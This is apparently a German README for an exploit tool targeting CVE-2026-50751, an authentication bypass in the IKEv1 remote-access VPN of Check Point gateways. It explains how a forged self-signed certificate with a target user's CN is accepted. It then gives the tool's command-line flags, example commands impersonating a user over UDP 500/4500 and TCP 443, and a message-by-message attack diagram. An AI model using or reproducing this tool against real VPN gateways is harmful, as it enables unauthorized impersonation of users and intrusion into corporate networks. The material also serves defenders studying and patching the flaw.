
Umgehung der Zertifikatsauthentifizierung in der Remote-Access-VPN von Check Point (IKEv1).
Bypass der Zertifikatsauthentifizierung im Remote-Access-VPN von Check Point (IKEv1).
CVE-2026-50751 ist ein Authentifizierungs-Bypass im iked-Daemon von Check Point, der in den Versionen R81.10, R82 und R82.10 ohne den Hotfix sk185033 vorhanden ist. Der Fehler ermöglicht es, sich als beliebiger provisionierter Remote-Access-Benutzer zu authentifizieren – ohne privaten Schlüssel, ohne Passwort und ohne gültiges Zertifikat.
Das verwundbare iked liest ein Flag aus der Vendor ID VPNExtFeatures (Bit 0x4) und überspringt, wenn es aktiviert ist, verify_peer_auth / verifyMessagePhase1. Daraus folgt:
Die Signatur des Zertifikats wird nicht überprüft (Nachweis des Besitzes).
Die Vertrauenskette wird nicht überprüft.
Es wird nur geprüft, ob der Subject DN zu einem provisionierten Benutzer aufgelöst werden kann.
Es genügt, ein selbstsigniertes Zertifikat zu fälschen, dessen CN= mit dem Zielbenutzer übereinstimmt, und es mit einer ungültigen Signatur zu senden. Wenn das Gateway Phase 1 akzeptiert, sind wir als dieser Benutzer authentifiziert (die ISAKMP-SA wird unter seinem DN gespeichert).
Es funktioniert über IKE (UDP 500/4500) und über Visitor Mode (TCPT, TCP 443).
Syntax
cve-2026-50751 -host <IP|hostname> -user <username> [opciones]
| Flag | Beschreibung | Standard |
|---|---|---|
-host | IP oder Hostname des Gateways (erforderlich) | — |
-user | RA-Benutzername, der imitiert werden soll (erforderlich) | — |
-port | Port: 500, 4500 (UDP) oder 443 (TCPT) | 500 |
-org | Organisation (O=) der ICA. Wenn weggelassen, wird sie aus dem TLS-Zertifikat abgeleitet | — |
-ou | Organisationseinheit (OU=) des Benutzers | users |
-timeout | Timeout pro Operation | 6s |
-retries | Wiederholungen von msg1 | 1 |
-v | Ausführliche Ausgabe | false |
sudo ./cve-2026-50751 -host 203.0.113.10 -port 500 -user victim -v
./cve-2026-50751 -host 203.0.113.10 -port 443 -user victim -v
./cve-2026-50751 -host 203.0.113.10 -user victim -org "ACME Corp" -ou vpn -v
sudo ./cve-2026-50751 -host 203.0.113.10 -port 4500 -user victim -v
Angreifer Gateway (verwundbares iked)
│ │
│─── msg1: SA (RSA-SIG) + VPNExtFeatures VID (Bit 0x4) ───▶│
│ │ Liest Flag 0x4
│ │ Setzt verify_peer_auth = skip
│◀── msg2: SA akzeptiert ──────────────────────────────────│
│ │
│─── msg3: KE (g^xi) + Ni ────────────────────────────────▶│
│◀── msg4: KE (g^xr) + Nr ─────────────────────────────────│
│ │
│ Leitet SKEYID, SKEYID_e, IV ab │
│ │
│─── msg5 (verschlüsselt): ID=gefälschter DN + selbst- │
│ signiertes CERT + Zufallssignatur ───▶│
│ │ Überspringt Signatur-
│ │ prüfung
│ │ Löst DN → Benutzer auf
│◀── msg6 (verschlüsselt): SA hergestellt ─────────────────│
│ │
│ Entschlüsselt msg6 mit SKEYID_e → Authentifizierungs- │
│ nachweis │